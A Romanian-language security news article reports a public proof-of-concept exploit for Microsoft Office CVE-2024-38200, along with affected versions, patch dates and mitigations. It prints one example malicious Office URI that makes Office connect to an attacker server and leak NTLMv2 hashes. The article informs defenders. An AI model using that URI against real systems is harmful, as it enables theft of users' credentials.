PoC exploit lansat pentru un 0-day în Microsoft Office
Sursă: https://cybersecuritynews.com
Specialiștii în securitate cibernetică au lansat un exploit de tip proof-of-concept (PoC) pentru vulnerabilitatea Microsoft Office CVE-2024-38200, dezvăluită recent, ce ar putea permite atacatorilor să obțină hash-urile NTLMv2 ale utilizatorilor.
Această vulnerabilitate cu severitate high afectează mai multe versiuni ale Microsoft Office, inclusiv Office 2016, Office 2019, Office LTSC 2021 și Microsoft 365 Apps for Enterprise.
Vulnerabilitatea, permite atacatorilor să inițieze o conexiune NTLM externă de la sistemul unei victime la un server de la distanță controlat de persoane rău intenționate.
Atunci când are loc această conexiune, Windows trimite automat hash-urile NTLM ale utilizatorului, inclusiv parola hash-uită, către serverul atacatorului.
Exploatarea PoC, publicată pe GitHub, demonstrează modul în care vulnerabilitatea poate fi exploatată utilizând schemele Office URI.
Prin crearea unui URI malițios (ex: ms-excel:ofe|u|http://192.168.1.7/leak.xlsx), atacatorii pot determina aplicațiile Office să acceseze un fișier de la distanță fără a genera avertismente. Acest lucru permite obținerea hash-urilor NTLMv2 prin protocoalele SMB și HTTP.
Specialiștii au remarcat că vulnerabilitatea este deosebit de periculoasă atunci când este combinată cu anumite configurații GPO (Group Policy Object) în Internet Properties.
Dacă sunt aplicate setări specifice, cum ar fi adăugarea de intervale IP la Trusted Sites sau activarea conectării automate pentru User Authentication, aplicația Office va efectua automat autentificarea NTLM, făcând exploatarea și mai ușoară.
În timp ce Microsoft a lansat o remediere parțială prin intermediul Feature Flighting pe 30 iulie 2024, un patch final a fost lansat cu actualizările din 13 august 2024.
Între timp, specialiștii în securitate cibernetică recomandă mai multe măsuri de mitigare, inclusiv restricționarea traficului NTLM de ieșire către servere la distanță, adăugarea utilizatorilor la grupul de securitate Protected Users și blocarea traficului de ieșire din portul TCP 445.
Publicarea acestui exploit de tip PoC evidențiază urgentarea aplicării celor mai recente actualizări și implementarea măsurilor de mitigare recomandate.
De asemenea, această problemă reamintește riscurile continue asociate cu autentificarea NTLM, pe care Microsoft a eliminat-o oficial în favoarea unor alternative mai sigure precum Kerberos.
Sursă: https://cybersecuritynews.com/poc-exploit-office-0-day-flaw/
